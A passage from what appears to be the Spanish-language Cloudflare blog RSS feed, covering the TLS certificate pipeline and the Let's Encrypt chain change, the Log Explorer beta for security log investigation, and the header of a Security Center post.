    <p>En la actualidad, Cloudflare gestiona decenas de millones de certificados en nombre de sus clientes. Para nosotros, una canalización sólida conlleva los siguientes beneficios:</p><ol><li><p>Los clientes siempre pueden obtener un certificado TLS para su dominio.</p></li><li><p>Los problemas relacionados con las CA no tienen ningún impacto en la capacidad de nuestros clientes para obtener un certificado.</p></li><li><p>Se utilizan las prácticas recomendadas de seguridad y los estándares modernos.</p></li><li><p>Optimización para la escala futura.</p></li><li><p>Compatibilidad con una amplia gama de clientes y dispositivos.</p></li></ol><p>Cada año, implementamos nuevas optimizaciones en nuestra canalización de certificados para mantener el más alto nivel de servicio. Así es como lo hacemos...</p>
    <div>
      <h3>Garantizamos que los clientes siempre puedan obtener un certificado TLS para su dominio</h3>
      <a href="#garantizamos-que-los-clientes-siempre-puedan-obtener-un-certificado-tls-para-su-dominio">
        
      </a>
    </div>
    <p>Desde el lanzamiento de Universal SSL en 2014, Cloudflare se ha encargado de emitir y entregar un certificado TLS para cada dominio protegido por nuestra red. Puede parecer trivial, pero hay algunos pasos que se deben ejecutar correctamente para que un dominio reciba un certificado:</p><ol><li><p>Los propietarios de dominios deben completar <a href="https://developers.cloudflare.com/ssl/edge-certificates/changing-dcv-method/">la validación de control de dominio</a> para cada emisión y renovación de certificado.</p></li><li><p>La autoridad de certificación necesita verificar el token de validación de control de dominio (DCV) para emitir el certificado.</p></li><li><p><a href="https://developers.cloudflare.com/ssl/edge-certificates/troubleshooting/caa-records/">Los registros CAA</a>, que dictan qué CA se pueden utilizar para un dominio, se  deben comprobar para garantizar que solo las partes autorizadas puedan emitir el certificado.</p></li><li><p>La autoridad de certificación debe estar disponible para emitir el certificado.</p></li></ol><p>Cada uno de estos pasos requiere la coordinación de varias partes: propietarios de dominios, CDN y autoridades de certificación. En Cloudflare, nos gusta tener el control cuando se trata del éxito de nuestra plataforma. Por eso, nos aseguramos de que cada uno de estos pasos llegue a feliz término.</p><p>Nos aseguramos de que cada emisión y renovación de certificado requiera el mínimo esfuerzo por parte de nuestros clientes. Para obtener un certificado, el propietario de un dominio tiene que completar la DCV para demostrar que realmente es el propietario del dominio. Una vez iniciada la solicitud del certificado, la CA devolverá el token DCV que el propietario del dominio deberá colocar en un registro DNS o un token HTTP. Si utilizas Cloudflare como tu proveedor de DNS, Cloudflare completa la DCV en tu nombre colocando automáticamente el token TXT devuelto por la CA en tu registro DNS. Como alternativa, si utilizas un proveedor de DNS externo, ofrecemos la opción de <a href="/introducing-dcv-delegation/">delegar la DCV</a> a Cloudflare para realizar renovaciones automáticas sin la intervención del cliente.</p><p>Una vez colocados, las CA verifican los tokens DCV. Las CA llevan a cabo esta <a href="/secure-certificate-issuance">verificación desde varios ámbitos</a> para evitar intentos de suplantación. Sin embargo, dado que estas comprobaciones se realizan desde varios países y ASN (sistemas autónomos), pueden activar una regla en el Cloudflare WAF que puede bloquear la comprobación de la DCV. Nos aseguramos de actualizar nuestro WAF y nuestro motor de seguridad para reconocer que estas solicitudes proceden de una CA y garantizar así que nunca se bloqueen y que la DCV se pueda completar con éxito.</p><p>Algunos clientes tienen preferencias de CA, debido a requisitos internos o a normativas de cumplimiento. Para evitar que una CA no autorizada emita un certificado para un dominio, el propietario del dominio puede crear un registro DNS de autorización de la autoridad de certificación (CAA), especificando qué CA pueden emitir un certificado para ese dominio. Para garantizar que los clientes siempre puedan obtener un certificado, comprobamos los registros de CAA antes de solicitar un certificado para saber qué CA debemos utilizar. Si los registros CAA bloquean todas las <a href="https://developers.cloudflare.com/ssl/reference/certificate-authorities/">CA que están disponibles</a> en la canalización de Cloudflare y el cliente no ha cargado un certificado de la CA de su elección, añadimos registros CAA en nombre de nuestros clientes para garantizar que puedan obtener un certificado emitido. Siempre que podemos, optimizamos las preferencias. De lo contrario, nuestro trabajo es evitar una interrupción asegurándonos de que siempre haya un certificado TLS disponible para el dominio, incluso si no procede de una CA preferida.</p><p>En la actualidad, Cloudflare no es una autoridad de certificación de confianza pública, por lo que dependemos de las CA que utilizamos para tener una alta disponibilidad. Sin embargo, un tiempo activo del 100 % es una expectativa poco realista. En cambio, nuestra canalización debe estar preparada en caso de que nuestras CA dejen de estar disponibles.</p>
    <div>
      <h4>Garantizamos que los problemas relacionados con las CA no tengan ningún impacto en la capacidad de nuestros clientes para obtener un certificado</h4>
      <a href="#garantizamos-que-los-problemas-relacionados-con-las-ca-no-tengan-ningun-impacto-en-la-capacidad-de-nuestros-clientes-para-obtener-un-certificado">
        
      </a>
    </div>
    <p>En Cloudflare, nos gusta pensar en el futuro, lo que significa prevenir los incidentes antes de que ocurran. No es raro que las CA dejen de estar disponibles. A veces ocurre debido a una interrupción, pero lo más común es que ocurra temporalmente durante los periodos de mantenimiento de las CA.</p><p>Nuestro trabajo es garantizar la redundancia de las CA, por lo que siempre tenemos varias preparadas para emitir un certificado, lo que garantiza una alta disponibilidad en todo momento. Si has observado que diferentes CA emiten tus certificados Universal SSL, es de forma intencionada. Distribuimos uniformemente la carga entre nuestras CA para evitar cualquier punto único de fallo. Además, monitorizamos la latencia y la tasa de error para detectar cualquier problema y cambiar automáticamente a una CA diferente que esté disponible y funcione. Puede que no lo sepas, pero una de nuestras CA se somete a 4 periodos de mantenimiento programados cada mes. Cuando esto sucede, nuestros sistemas automatizados se activan de forma eficaz, para que todo funcione sin problemas. Todo el proceso se desarrolla tan bien que ya no tenemos que localizar a nuestros equipos internos porque todo <i>funciona, sin más.</i></p>
    <div>
      <h4>Adopción de las prácticas recomendadas de seguridad y estándares modernos</h4>
      <a href="#adopcion-de-las-practicas-recomendadas-de-seguridad-y-estandares-modernos">
        
      </a>
    </div>
    <p>La seguridad siempre ha sido, y seguirá siendo, la principal prioridad de Cloudflare, por lo que es fundamental mantener los más altos estándares de seguridad para proteger los datos de nuestros clientes y las claves privadas.</p><p>Durante la última década, el <a href="https://cabforum.org/">CA/Browser Forum</a> ha abogado por reducir la vida útil de los certificados de 5 años a 90 días como norma del sector. Este cambio ayuda a minimizar la amenaza de una clave en riesgo. Cuando los certificados se renuevan cada 90 días, sus claves privadas siguen siendo válidas solo durante ese periodo, lo que reduce la ventana de tiempo en que un ciberdelincuente puede hacer uso del material en riesgo.</p><p>Apoyamos plenamente este cambio y hemos establecido 90 días como periodo de validez del certificado por defecto. Este cambio mejora nuestra postura de seguridad porque garantiza renovaciones regulares de las claves, y nos ha empujado a desarrollar herramientas como DCV Delegation que promueven la automatización en torno a las renovaciones frecuentes de certificados, sin la sobrecarga adicional. Esta función es lo que nos permite ofrecer certificados con periodos de validez de tan solo dos semanas, para los clientes que quieren renovar sus claves privadas con mucha frecuencia sin preocuparse de que esto provoque fallos en la renovación del certificado.</p><p>Cloudflare siempre ha estado a la vanguardia de los nuevos protocolos y estándares. <a href="https://www.cloudflare.com/press-releases/2014/cloudflare-offers-the-industrys-first-universal-ssl-for-free/">No es ningún secreto</a> que cuando apoyamos un nuevo protocolo, la adopción se dispara. Este mes añadiremos la compatibilidad <a href="/ecdsa-the-digital-signature-algorithm-of-a-better-internet">ECDSA</a> para certificados emitidos desde <a href="https://pki.goog/">Google Trust Services</a>. Con ECDSA, obtienes el mismo nivel de seguridad que RSA, pero con claves más pequeñas. Las claves más pequeñas implican certificados más pequeños y menos datos que se pasan para establecer una conexión TLS , lo que se traduce en conexiones y tiempos de carga más rápidos.</p>
    <div>
      <h4>Optimización para la escala futura</h4>
      <a href="#optimizacion-para-la-escala-futura">
        
      </a>
    </div>
    <p>En la actualidad, Cloudflare emite casi un millón de certificados al día. Con el reciente cambio hacia una vida útil más corta de los certificados, seguimos mejorando nuestra canalización para que sea más sólida. Pero incluso si nuestra canalización puede gestionar la carga significativa, aún necesitamos confiar en nuestras CA para poder escalar con nosotros. Con cada CA que integramos, nos convertimos instantáneamente en uno de sus mayores usuarios. Exigimos a nuestras autoridades de certificación un alto nivel y las impulsamos a mejorar su infraestructura para escalar. Esto no solo beneficia a los clientes de Cloudflare, sino que ayuda a Internet, ya que exige a las CA que gestionen mayores volúmenes de emisión.</p><p>Y ahora que Let's Encrypt reduce su cadena de confianza, vamos a añadir una mejora adicional a nuestra canalización, una que garantice la mejor compatibilidad de dispositivos para todos.</p>
    <div>
      <h4>Compatibilidad para todos los clientes con dispositivos heredados y modernos</h4>
      <a href="#compatibilidad-para-todos-los-clientes-con-dispositivos-heredados-y-modernos">
        
      </a>
    </div>
    <p>El próximo cambio de Let's Encrypt evitará que los dispositivos heredados realicen solicitudes a dominios o aplicaciones que estén protegidos por un certificado de Let's Encrypt. No queremos interrumpir el acceso a Internet desde ninguna parte del mundo, lo que significa que vamos a seguir ofreciendo la mejor compatibilidad de dispositivos a nuestros clientes, a pesar del cambio.</p><p>Gracias a todas las mejoras recientes, podemos reducir nuestra dependencia de Let's Encrypt sin afectar la fiabilidad o la calidad de servicio de nuestra canalización de certificados. Con un ciclo de vida de los certificados (90 días) antes del cambio, vamos a empezar a cambiar los certificados para utilizar una CA diferente, una que sea compatible con los dispositivos que se verán afectados. De este modo, mitigaremos cualquier impacto sin necesidad de que nuestros clientes tengan que intervenir. Los únicos clientes que seguirán utilizando Let's Encrypt son aquellos que hayan elegido específicamente Let's Encrypt como CA.</p>
    <div>
      <h3>Próximos pasos con el cambio de Let's Encrypt</h3>
      <a href="#proximos-pasos-con-el-cambio-de-lets-encrypt">
        
      </a>
    </div>
    <p>La cadena con firma cruzada de Let's Encrypt <a href="https://letsencrypt.org/2023/07/10/cross-sign-expiration.html">expirará</a> el 30 de septiembre de 2024. Aunque Let's Encrypt planea dejar de emitir certificados de esta cadena el 6 de junio de 2024, Cloudflare seguirá sirviendo la cadena con firma cruzada para todos los certificados de Let's Encrypt hasta el 9 de septiembre de 2024.</p><p>Con 90 días o un ciclo de vida de certificado antes del cambio, vamos a empezar a cambiar los certificados de Let's Encrypt para que utilicen una autoridad de certificación diferente. Implementaremos el cambio en todos los productos en los que Cloudflare sea responsable de la selección de la CA, lo que significa que será automático para los clientes que utilicen Universal SSL y SSL for SaaS con la opción "CA por defecto".</p><p>Cualquier cliente que haya elegido específicamente Let's Encrypt como su CA recibirá una notificación por correo electrónico con una lista de sus certificados de Let's Encrypt e información sobre si estamos viendo o no solicitudes en esos nombres de host procedentes de dispositivos heredados.</p><p>A partir del 9 de septiembre de 2024, Cloudflare servirá todos los certificados de Let's Encrypt utilizando la cadena ISRG Root X1. Esto es lo que deberías esperar en función del producto de certificado que estés utilizando:</p>
    <div>
      <h4>Universal SSL</h4>
      <a href="#universal-ssl">
        
      </a>
    </div>
    <p>Con <a href="https://developers.cloudflare.com/ssl/edge-certificates/universal-ssl/">Universal SSL</a>, Cloudflare elige la CA que se utiliza para el certificado del dominio. De esta manera, podemos elegir el mejor certificado para nuestros clientes. <b>Si utilizas Universal SSL, no tendrás que hacer nada antes del cambio</b>. Cloudflare cambiará automáticamente tu certificado para que utilice una CA más compatible.</p>
    <div>
      <h4>Advanced Certificates</h4>
      <a href="#advanced-certificates">
        
      </a>
    </div>
    <p>Con <a href="https://developers.cloudflare.com/ssl/edge-certificates/advanced-certificate-manager/">Advanced Certificate Manager</a>, los clientes eligen específicamente qué CA quieren utilizar. Si eligieron Let's Encrypt como la CA para un certificado, respetaremos la elección, porque los clientes pueden haber elegido esta CA en concreto debido a requisitos internos, o porque han implementado el anclaje de certificados, lo que desaconsejamos encarecidamente.</p><p>Si prevemos que un dominio que utiliza un certificado avanzado emitido por Let's Encrypt se verá afectado por el cambio, enviaremos notificaciones por correo electrónico para informar a esos clientes sobre que certificados utilizan Let's Encrypt como su CA y si esos dominios están recibiendo o no solicitudes del cliente que se verá afectado por el cambio. Los clientes serán responsables de cambiar la CA a otro proveedor, si así lo deciden.</p>
    <div>
      <h4>SSL para SaaS</h4>
      <a href="#ssl-para-saas">
        
      </a>
    </div>
    <p>Con <a href="https://developers.cloudflare.com/cloudflare-for-platforms/cloudflare-for-saas/security/certificate-management/">SSL for SaaS</a>, los clientes tienen dos opciones: utilizar una CA por defecto, lo que significa que Cloudflare elegirá la autoridad emisora, o especificar qué CA utilizar.</p><p>Si dejas la elección de la CA en manos de Cloudflare, utilizaremos automáticamente una CA con mayor compatibilidad de dispositivos.</p><p>Si especificas una determinada autoridad de certificación para tus nombres de host personalizados, respetaremos esa elección. Enviaremos un correo electrónico a los proveedores y plataformas de SaaS para informarles de qué nombres de host personalizados están recibiendo solicitudes de dispositivos heredados. Los clientes serán responsables de cambiar la CA a otro proveedor, si así lo deciden.</p>
    <div>
      <h4>Certificados personalizados</h4>
      <a href="#certificados-personalizados">
        
      </a>
    </div>
    <p>Si haces una integración directa con Let's Encrypt y utilizas <a href="https://developers.cloudflare.com/ssl/edge-certificates/custom-certificates/">certificados personalizados</a> para cargar tus certificados de Let's Encrypt en Cloudflare, tus certificados se incluirán en la cadena con firma cruzada, siempre que elijas el método de paquete "<a href="https://developers.cloudflare.com/ssl/edge-certificates/custom-certificates/bundling-methodologies/#compatible">compatible</a>" o "<a href="https://developers.cloudflare.com/ssl/edge-certificates/custom-certificates/bundling-methodologies/#modern">moderno</a>" y los cargues antes del 9 de septiembre de 2024. Después del 9 de septiembre, agruparemos todos los certificados de Let's Encrypt con la cadena ISRG Root X1. Con el método de paquete "<a href="https://developers.cloudflare.com/ssl/edge-certificates/custom-certificates/bundling-methodologies/#user-defined">definido por el usuario</a>", siempre servimos la cadena que se carga en Cloudflare. Si cargas certificados de Let's Encrypt con este método, tendrás que asegurarte de que los certificados cargados después del 30 de septiembre de 2024, la fecha de caducidad de la CA, contienen la cadena de certificados correcta.</p><p>Además, si controlas los clientes que se conectan a tu aplicación, te recomendamos que actualices el almacén de confianza para incluir <a href="https://letsencrypt.org/certificates/#root-certificates">ISRG Root X1</a>. Si utilizas el anclaje de certificados, elimina o actualiza tu anclaje. En general, desaconsejamos a todos los clientes que anclen sus certificados, ya que esto suele causar problemas durante las renovaciones de certificados o los cambios de CA.</p>
    <div>
      <h2>Conclusión</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>Los estándares de Internet seguirán evolucionando y mejorando. Conforme apoyamos y adoptamos esos cambios, también debemos reconocer que es nuestra responsabilidad mantener a los usuarios en línea y el acceso a Internet en las partes del mundo donde las nuevas tecnologías no están disponibles. Con Cloudflare, siempre tienes la opción de elegir la configuración que mejor se adapte a tu aplicación.</p><p>Para obtener más información sobre este cambio, consulta nuestra <a href="https://developers.cloudflare.com/ssl/reference/migration-guides/lets-encrypt-chain/">documentación para desarrolladores</a>.</p> ]]></content:encoded>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Servicios de aplicación]]></category>
            <category><![CDATA[TLS]]></category>
            <category><![CDATA[SSL]]></category>
            <category><![CDATA[Certificate Authority (ES)]]></category>
            <category><![CDATA[Deep Dive (ES)]]></category>
            <guid isPermaLink="false">ymep6DaFvevM4m2AIdw5F</guid>
            <dc:creator>Dina Kozlov</dc:creator>
        </item>
        <item>
            <title><![CDATA[Log Explorer supervisa los eventos de seguridad sin almacenamiento de terceros]]></title>
            <link>https://blog.cloudflare.com/es-es/log-explorer/</link>
            <pubDate>Fri, 08 Mar 2024 14:05:00 GMT</pubDate>
            <description><![CDATA[ La eficacia conjunta de nuestros análisis de seguridad y Log Explorer permite a los equipos de seguridad analizar, investigar y supervisar los ataques a la seguridad de forma nativa en Cloudflare. De esta forma, conseguimos reducir el tiempo de resolución y el coste total de propiedad para nuestros ]]></description>
            <content:encoded><![CDATA[ <p>Hoy nos complace anunciar la disponibilidad de la versión beta de <a href="https://developers.cloudflare.com/logs/log-explorer/">Log Explorer</a>, que te permite investigar tus registros de eventos HTTP y de seguridad directamente desde el panel de control de Cloudflare. Log Explorer es una extensión de <a href="/es-es/security-analytics-es-es">Security Analytics</a>, que te ofrece la posibilidad de consultar los registros sin procesar relacionados. Puedes analizar, investigar y supervisar los ataques a la seguridad de forma nativa en el panel de control de Cloudflare. De esta forma, reduces el tiempo de resolución y el coste total de propiedad al eliminar la necesidad de reenviar los registros a herramientas de análisis de seguridad de terceros.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1GhVBYNZAsGZtOfgo8C3VY/42fc180d060574162071cbdd13ad6a88/image6-6.png" />
            
            </figure>
    <div>
      <h3>Antecedentes</h3>
      <a href="#antecedentes">
        
      </a>
    </div>
    <p>Security Analytics te permite analizar todo tu tráfico HTTP en un solo lugar, proporcionándote la óptica de seguridad que necesitas para identificar lo más importante y tomar medidas para resolverlo: el tráfico potencialmente malicioso que no ha sido mitigado. Security Analytics incluye vistas integradas (como las estadísticas principales) y filtros rápidos en contexto, en un diseño de página intuitivo que permite una exploración y validación rápidas.</p><p>Para impulsar nuestros completos paneles de control de análisis con un rendimiento de consulta rápido, hemos implementado el <a href="https://developers.cloudflare.com/analytics/graphql-api/sampling/">muestreo de datos</a> utilizando <a href="/explaining-cloudflares-abr-analytics/"></a>análisis de <a href="/explaining-cloudflares-abr-analytics/">velocidad adaptativa de bits</a> (ABR). Esto resulta muy adecuado para proporcionar vistas agregadas de alto nivel de los datos. Sin embargo, muchos usuarios avanzados de Security Analytics nos han comentado que a veces necesitan acceder a una vista más granular de los datos: necesitan los registros.</p><p>Los registros proporcionan una visibilidad esencial de las operaciones de los sistemas informáticos actuales. Los ingenieros y los analistas de los centros de operaciones de seguridad (SOC) utilizan los registros a diario para solucionar problemas, identificar e investigar incidentes de seguridad y ajustar el rendimiento, la fiabilidad y la seguridad de sus aplicaciones y su infraestructura. Las soluciones de supervisión o las métricas tradicionales ofrecen datos agregados o estadísticos que pueden utilizarse para identificar tendencias. Las métricas son muy útiles para identificar QUÉ ha ocurrido, pero carecen de eventos detallados que ayuden a los ingenieros a descubrir POR QUÉ ha ocurrido. Los ingenieros y los analistas de los SOC dependen de los datos de registro sin procesar para responder a distintas preguntas:</p><ul><li><p>¿Cuál es la causa de este aumento de los errores 403?</p></li><li><p>¿A qué datos ha accedido esta dirección IP?</p></li><li><p>¿Cuál ha sido la experiencia de este usuario específico con su sesión?</p></li></ul><p>Tradicionalmente, estos ingenieros y analistas reunían un conjunto de diversas herramientas de supervisión para capturar los registros y obtener esta visibilidad. Puesto que cada vez más organizaciones utilizan varias nubes, o un entorno híbrido con herramientas y arquitectura tanto en la nube como locales, es fundamental disponer de una plataforma unificada para recuperar la visibilidad de este entorno cada vez más complejo.  Cuando cada vez más empresas adoptan una arquitectura nativa de nube, consideramos la <a href="https://www.cloudflare.com/es-es/learning/cloud/what-is-a-connectivity-cloud/">conectividad cloud de Cloudflare</a> como una parte integral de su estrategia de rendimiento y seguridad.</p><p>Log Explorer ofrece una opción más económica para el almacenamiento y la exploración de tus datos de registro en Cloudflare. Hasta hoy, hemos ofrecido la posibilidad de exportar los registros a costosas herramientas de terceros. Ahora, con Log Explorer, puedes explorar rápida y fácilmente tus datos de registro sin salir del panel de control de Cloudflare.</p>
    <div>
      <h3>Funciones de Log Explorer</h3>
      <a href="#funciones-de-log-explorer">
        
      </a>
    </div>
    <p>Ya seas un ingeniero del SOC que investiga posibles incidentes, o un responsable del cumplimiento con requisitos específicos de retención de registros, Log Explorer es la opción ideal para ti. Almacena tus registros de Cloudflare durante un periodo de tiempo ilimitado y personalizable, de forma que están accesibles de forma nativa desde el panel de control de Cloudflare. Admite estas funciones:</p><ul><li><p>Buscar en tus registros de eventos de seguridad o solicitudes HTTP</p></li><li><p>Filtrar por cualquier campo y una serie de operadores estándar</p></li><li><p>Cambiar entre el modo de filtro básico o la interfaz de consulta SQL</p></li><li><p>Seleccionar los campos para mostrar</p></li><li><p>Ver los eventos de registro en formato tabular</p></li><li><p>Buscar los registros de solicitudes HTTP asociados a un Id. de rayo</p></li></ul>
    <div>
      <h3>Reducir el tráfico no mitigado</h3>
      <a href="#reducir-el-trafico-no-mitigado">
        
      </a>
    </div>
    <p>Como analista del SOC, tu trabajo consiste en supervisar y responder a las amenazas y a los incidentes en la red de tu organización. Con Security Analytics, y ahora con Log Explorer, puedes identificar las anomalías y realizar una investigación forense, todo en un mismo lugar.</p><p>Veamos un ejemplo para mostrar esto en la práctica:</p><p>En el panel de control de Security Analytics, puedes ver en el panel Insights que hay tráfico que se ha etiquetado como probablemente correspondiente a un ataque, pero que no se ha mitigado.</p><p>Con un clic en el botón de filtro puedes reducir el número de solicitudes para acotar tu investigación.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Oq3oqY8JXMigK8OJKPFZ4/5d3a8751a56f06f58e96538f1d46a480/Screenshot-2024-03-07-at-20.20.41.png" />
            
            </figure><p>En la vista de registros muestreados, puedes observar que la mayoría de estas solicitudes proceden de una dirección IP de cliente común.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7sWkjUYz1J0So4nphy4FSs/769d5ebb0b706a073a616b706783030c/image11.jpg" />
            
            </figure><p>También puedes ver que Cloudflare ha marcado todas estas solicitudes como tráfico de bots. Con esta información, puedes elaborar una regla WAF para bloquear todo el tráfico procedente de esta dirección IP, o bien para bloquear todo el tráfico que tenga una puntuación de bot inferior a 10.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5gtrP14GKbnB0YeV0ySgL1/6b476ec9d19e255912315eac9730604d/Sampled-logs.png" />
            
            </figure><p>Supongamos que el equipo responsable del cumplimiento quiere reunir documentación sobre el alcance y la repercusión de este ataque. Podemos detallar más en los registros durante este periodo de tiempo para ver todo a lo que este atacante ha intentado acceder.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2YgFTRD7u3KYh0bbInLylK/f076a70bc09f41d8ace0569bca172b39/Screenshot-2024-03-07-at-20.22.04.png" />
            
            </figure><p>En primer lugar, podemos utilizar Log Explorer para consultar las solicitudes HTTP procedentes de la dirección IP sospechosa durante el intervalo de tiempo del pico observado en Security Analytics.</p><p>También podemos revisar si el atacante ha podido exfiltrar datos. Para ello, añadimos el campo OriginResponseBytes y actualizamos la consulta para que muestre las solicitudes con OriginResponseBytes &gt; 0. Los resultados muestran que no se han exfiltrado datos.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/qsi7UnxjtygCQHnMCIx02/cda0aacf6d783b05c15196f27907c611/Log-Explorer.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/YyewPADkPzjofXHXSihyi/e494ca5d4b9a3ad7071d5d3e27f57887/Query-results.png" />
            
            </figure>
    <div>
      <h3>Encuentra e investiga los falsos positivos</h3>
      <a href="#encuentra-e-investiga-los-falsos-positivos">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3TgN2aPwWTDo5niA95TGQx/71143be92550dfea1ce284507fa688ac/No-logs-found.png" />
            
            </figure><p>Con el acceso a los registros completos mediante Log Explorer, ahora puedes realizar una búsqueda de solicitudes específicas.</p><p>Un error 403 se produce cuando se bloquea la solicitud de un usuario a un sitio determinado. Los productos de seguridad de Cloudflare utilizan elementos como la <a href="/introducing-ip-lists/">reputación de IP</a> y <a href="/es-es/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter-es-es/">WAF Attack Score</a> basados en tecnologías de aprendizaje automático con el fin de evaluar si una determinada solicitud HTTP es maliciosa. Esto es extremadamente eficaz, pero a veces las solicitudes se marcan erróneamente como maliciosas y se bloquean.</p><p>En estas situaciones, ahora podemos utilizar Log Explorer para identificar estas solicitudes y por qué se han bloqueado, y a continuación ajustar las reglas WAF pertinentes en consecuencia.</p><p>O bien, si te interesa rastrear una solicitud concreta por Id. de rayo (RayID, un identificador que se asigna a cada solicitud que pasa por Cloudflare) puedes hacerlo mediante Log Explorer con una sola consulta.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5ecKfF4lRDQSyLCoOgDjTw/6f0872962caff8d719958e6fdfcc8dbc/Log-Explorer-2.png" />
            
            </figure><p>Ten en cuenta que la cláusula LIMIT se incluye por defecto en la consulta, pero no afecta a las consultas RayID, ya que RayID es único y sólo se devolvería un registro al utilizar el campo de filtro RayID.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3NCDOP0axFC3wZ4qs03Jei/86286da2fd9fca3cdb68214c1d0f472a/Log-Explorer-3.png" />
            
            </figure>
    <div>
      <h3>Cómo hemos desarrollado Log Explorer</h3>
      <a href="#como-hemos-desarrollado-log-explorer">
        
      </a>
    </div>
    <p>Con Log Explorer, hemos desarrollado una plataforma de almacenamiento de registros a largo plazo de tipo append-only sobre <a href="/es-es/r2-ga-es-es">Cloudflare R2</a>. Log Explorer utiliza el protocolo <a href="https://databricks.com/wp-content/uploads/2020/08/p975-armbrust.pdf">Delta Lake</a>, un marco de almacenamiento de código abierto para desarrollar bases de datos de alto rendimiento conpatibles con <a href="https://es.wikipedia.org/wiki/ACID">ACID</a> sobre un almacén de objetos en la nube. En otras palabras, Log Explorer combina un sistema de almacenamiento grande y rentable, Cloudflare R2, con las ventajas de su sólida coherencia y su alto rendimiento. Además, Log Explorer te proporciona una interfaz SQL para tus registros de Cloudflare.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3pNBd5iSyVW7aqfJ0JfYDP/89cd0341cc35ad9d86fd8687ba7a9147/How-we-built-Log-Explorer.png" />
            
            </figure><p>Cada conjunto de datos de Log Explorer se almacena a nivel de cada cliente, igual que Cloudflare D1, de forma que tus datos no se mezclan con los de otros clientes. En el futuro, este modelo de almacenamiento de cliente único te permitirá crear tus propias políticas de retención y decidir en qué regiones quieres almacenar tus datos.</p><p>A nivel interno, los conjuntos de datos de cada cliente se almacenan como tablas Delta en buckets R2. Una tabla <i>Delta</i> es un formato de almacenamiento que organiza objetos Apache Parquet en directorios utilizando la convención de nomenclatura de las particiones de Hive. Fundamentalmente, las tablas Delta emparejan estos objetos de almacenamiento con un registro de transacciones de tipo append-only que incluye puntos de verificación. Este diseño permite que Log Explorer admita múltiples escritores con concurrencia optimista.</p><p>Muchos de los productos que desarrolla Cloudflare son un resultado directo de los desafíos que nuestro propio equipo trata de abordar. Log Explorer es un ejemplo perfecto de esta <a href="/es-es/tag/dogfooding">cultura de <i>dogfooding</i></a>. Las escrituras concurrentes optimistas requieren actualizaciones atómicas en el almacén de objetos subyacente, y considerando nuestras necesidades, R2 ha añadido una operación PutIfAbsent con fuerte coherencia. ¡Gracias, R2! La operación atómica diferencia a Log Explorer de las soluciones Delta Lake basadas en S3 de Amazon Web Services, que incurren en la carga operativa de utilizar un <a href="https://delta.io/blog/2022-05-18-multi-cluster-writes-to-delta-lake-storage-in-s3/">almacén externo</a> para sincronizar las escrituras.</p><p>Log Explorer está escrito en el lenguaje de programación Rust utilizando bibliotecas de código abierto, como <a href="https://github.com/delta-io/delta-rs">delta-rs</a>, una implementación Rust nativa del protocolo Delta Lake, y <a href="https://arrow.apache.org/datafusion/">Apache Arrow DataFusion</a>, un motor de consulta muy rápido y extensible. En Cloudflare, Rust se ha convertido en una opción popular para el desarrollo de nuevos productos, debido a sus ventajas en seguridad y rendimiento.</p>
    <div>
      <h3>¿Y ahora qué?</h3>
      <a href="#y-ahora-que">
        
      </a>
    </div>
    <p>Sabemos que los registros de seguridad de las aplicaciones son sólo una pieza del rompecabezas que permite comprender lo que sucede en tu entorno. Permanece atento a nuestros futuros desarrollos, como una integración más estrecha y fluida entre Analytics y Log Explorer, la incorporación de más conjuntos de datos, incluidos los registros Zero Trust, la posibilidad de definir periodos de retención personalizados y las alertas personalizadas integradas.</p><p>Utiliza el <a href="https://forms.gle/tvKQDdXmCk98zyV9A">enlace de comentarios</a> para contarnos qué te parece Log Explorer y qué otras cosas te facilitarían tu trabajo.</p>
    <div>
      <h3>Cómo conseguirlo</h3>
      <a href="#como-conseguirlo">
        
      </a>
    </div>
    <p>¡Nos encantaría saber de ti! Si te interesa unirte a nuestro programa Beta, rellena <a href="https://www.cloudflare.com/es-es/lp/log-explorer/">este formulario</a> y un miembro de nuestro equipo se pondrá en contacto contigo.</p><p>El precio definitivo se establecerá antes de la disponibilidad general del producto.</p><p>Descubre más noticias, anuncios y debates que invitan a la reflexión. Consulta la <a href="https://cloudflare.tv/shows/security-week">página de Security Week</a>.</p><div>
  
</div> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Analytics (ES)]]></category>
            <category><![CDATA[Logs (ES)]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[undefined]]></category>
            <category><![CDATA[SIEM (ES)]]></category>
            <category><![CDATA[Noticias de productos]]></category>
            <category><![CDATA[Conectividad cloud]]></category>
            <guid isPermaLink="false">3K5UjFarMC09kkM507HshK</guid>
            <dc:creator>Jen Sells</dc:creator>
            <dc:creator>Claudio Jolowicz</dc:creator>
            <dc:creator>Cole MacKenzie</dc:creator>
        </item>
        <item>
            <title><![CDATA[Protege tus activos expuestos con nuestro Centro de seguridad: resumen para los CISO]]></title>
            <link>https://blog.cloudflare.com/es-es/security-insights-quick-ciso-view/</link>
            <pubDate>Tue, 05 Mar 2024 14:02:00 GMT</pubDate>
            <description><![CDATA[ Hoy nos complace anunciar un nuevo conjunto de capacidades en nuestro Centro de seguridad para abordar directamente un desafío común: garantizar una implementación completa en toda tu infraestructura. Consigue información precisa sobre dónde y cómo optimizar tu postura de seguridad
 ]]></description>
